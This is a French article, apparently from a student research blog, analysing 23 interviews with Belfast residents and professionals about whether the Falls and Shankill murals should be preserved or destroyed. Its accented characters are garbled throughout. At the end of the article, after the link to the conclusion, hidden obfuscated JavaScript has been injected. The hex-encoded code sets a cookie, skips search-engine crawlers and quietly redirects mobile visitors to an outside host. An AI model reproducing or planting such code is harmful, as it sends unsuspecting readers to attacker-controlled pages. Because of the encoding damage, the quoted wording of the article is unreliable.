Analyse des donnA�es

Comme nous la��avons prA�sentA� dans la��article MA�thodologie,A�nous avons basA� notre recherche sur la��interview da��habitants de Belfast afin de comprendre leurs points de vue par rapport A� la question de la destruction ou de la conservation des fresques.

Cet article prA�sentera dans un premier temps les donnA�es, puis nous tenterons de mettre en A�vidence certaines tendances.

PrA�sentation des donnA�es

Notre objectif, avant da��aller sur le terrain, A�tait de rA�colter un maximum da��informations provenant des habitants des quartiers de Fall et Shankill. Dans ces deux quartiers se trouvent ou se trouvaient les murals qui ont fait la��objet de notre A�tude. Pourtant, sur place, nous avons jugA� important da��A�largir le public cible afin da��obtenir une information plus complA?te sur le dA�bat entre la prA�servation ou non des murals.

Notre A�chantillon est composA� au total de 23 interviews. La durA�e de ces entretiens varie entre une et vingt minutes. Les personnes interrogA�es sont A?gA�es entre 16 et 74 ans. La majoritA� des interviews se sont dA�roulA�es dans les quartiers citA�s auparavant: Fall et Shankill. Toutefois, au cours de nos diffA�rentes activitA�s durant notre sA�jour, nous avons A�galement eu la chance da��obtenir les tA�moignages de divers professionnels: un guide touristique, deux archivistes da��un centre de documentation dont la��un est spA�cialisA� dans les troubles, un conducteur de Black Taxi*, un reprA�sentant du Centre GaA�lique et un collaborateur du City Council de Belfast, le conseil municipal de la ville.

Nous avons conscience que notre A�chantillon, de taille limitA�e, est loin da��A?tre reprA�sentatif de la population. Cependant, nous essayerons de voir sa��il existe tout de mA?me des rA�currences dans les rA�ponses des habitants de la ville.

L’importance des murals pour les locaux

Nous avons choisi, au vu des types de rA�ponses donnA�es lors des interviews, de sA�parer la��A�chantillon en catA�gories da��analyse.

Tout da��abord, nous avons sA�parA� les adolescents des personnes plus A?gA�es. En effet, les jeunes semblaient A?tre moins affectA�s par la situation post-conflit que les personnes plus A?gA�es. Certains des adolescents ont parlA� a�?au nom des jeunesa�? en affirmant que leur catA�gorie da��A?ge accordait peu da��importance aux murals. De ce fait, ils paraissaient plus dA�tachA�s du passA� de Belfast.

Ensuite, concernant la��importance des murals pour les Belfastois (par rapport aux fresques A�tudiA�es), certains interviewA�s considA?rent que les habitants des quartiers de Fall et Sankill, A�tant donnA� leur proximitA� gA�ographique avec ces fresques, sont les plus touchA�s par la prA�sence des murals. Da��autres personnes interrogA�es ont, elles, indiquA� que les habitants na��accordent que peu da��importance A� ces fresques au quotidien. Une minoritA� des individus sondA�s ont affirmA� que les fresques ont A� leurs yeux une valeur touristique trA?s importante.

Finalement, nous avons constatA� que les personnes interrogA�es dans le quartier de Fall ne connaissaient pas, pour la plupart, la fresque de Shankill. Par ailleurs, les personnes sondA�es de chacun des quartiers avaient peu da��informations A� fournir A� propos des murals du quartier opposA�.

PassA� et prA�servation

La plupart des personnes interrogA�es qui commentaient la��importance des murals pour les habitants A�voquaient des A�lA�ments temporels. Beaucoup faisaient rA�fA�rence au passA� en dA�signant les fresques comme un A�lA�ment de mA�moire permettant de se souvenir du conflit. Les phrases telles que a�?pour la mA�moirea�? ou encore a�?en souvenir dea�? ont A�tA� prononcA�es A� plusieurs reprises.

Quant A� la question de la prA�servation ou de la destruction des murals, une majoritA� des personnes interrogA�es nous ont expliquA� que, selon elles, les murals avaient effectivement encore aujourda��hui leur place au sein des diffA�rents quartiers. Beaucoup considA�raient cependant que les murals A� caractA?re trop violent devraient A?tre dA�truits. Pour da��autres, au contraire, la��aspect de commA�moration prA?nait sur la destruction, ca��est pourquoi la prA�servation semblait A?tre une meilleure option. Par ailleurs, selon ces personnes, la conservation est non seulement un moyen de faire en sorte que la population se souvienne des A�vA�nements passA�s, mais elle bA�nA�ficie A�galement A� la��industrie touristique de la ville. Un A�lA�ment qua��une personne interviewA�e a mentionnA� nous a paru intA�ressant A� relever au vu de la problA�matique qua��a vA�cu Belfast entre ses communautA�s dans le passA�. Cette personne a en effet A�voquA� le fait que la question de la prA�servation ou destruction des murals devrait se poser en fonction de la��A�volution du poids dA�mographique des diffA�rentes populations qui habitent la ville.

A�volution et nouveaux murals

Comme mentionnA� prA�cA�demment, certaines personnes A�taient opposA�es aux fresques a�?trop violentesa�? (sans pour autant spA�cifier ce qua��elles entendaient par a�?trop violentesa�?) et souhaitaient la crA�ation de nouveaux murals A� caractA?re plus pacifique et plus inclusif. La��envie de a�?passer A� autre chosea�? a A�tA� exprimA�e A� plusieurs reprises. Dans ce contexte, beaucoup A�taient plutA?t satisfaits des nouvelles fresques. Celles-ci A�taient considA�rA�es comme A�tant plus reprA�sentatives de toutes les communautA�s et permettant de vA�hiculer un message de paix et de solidaritA�.

Outre les personnes ayant exprimA� leur volontA� de voir certains murals dA�truits, da��autres ont soulignA� la��importance de trouver un A�quilibre entre les anciennes et les nouvelles fresques. La��un des archivistes du centre de documentation a apportA� un point de rA�flexion qui nous semble important. Il a mis en exergue la peinture murale comme A�tant devenue une tradition faisant partie de la culture des deux communautA�s. Cette pratique A�tait, selon lui, une fiertA� pour les populations locales.

Les lieux de conservation de la culture A� Belfast

Par ailleurs, la��autre archiviste spA�cialisA� dans les troubles que nous avons interrogA� ainsi qua��un collaborateur du City Council ont relevA� un point supplA�mentaire qui nous a paru intA�ressant: la question du lieu oA? se situent les A�lA�ments de mA�moire. En effet, avoir un lieu consacrA� A� la��histoire du conflit et la prA�sentation da��objets liA�s aux troubles est important pour la ville, selon la��archiviste. Il a A�galement exprimA� une certaine rA�ticence A� la prA�sence de ces peintures dans des lieux publics. Par ailleurs, le fait que les murals sont hier comme aujourda��hui imposA�s A� tous, pose, selon lui, de nombreux problA?mes.

Enfin, le collaborateur du City Council a exprimA� sa dA�ception lorsqua��il sa��agissait de parler des politiques de conciliation entre culture et conservation. Selon lui, il reste encore des progrA?s A� faire A� ce niveau-lA� A� Belfast et aucune solution na��a encore A�tA� apportA�e afin de crA�er un lieu, neutre, qui puisse rA�unir et conserver la culture de la ville dans son ensemble. MalgrA� des tentatives de conciliation, il na��y a aujourda��hui aucun musA�e qui retrace la��histoire du conflit.

*La��association Black Taxi propose des circuits de dA�couverte des murals menA�s par des anciens membres de la��IRA, la��Irish Republican Army, reconvertis en chauffeur de taxi.

Lire aussi notre conclusion.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.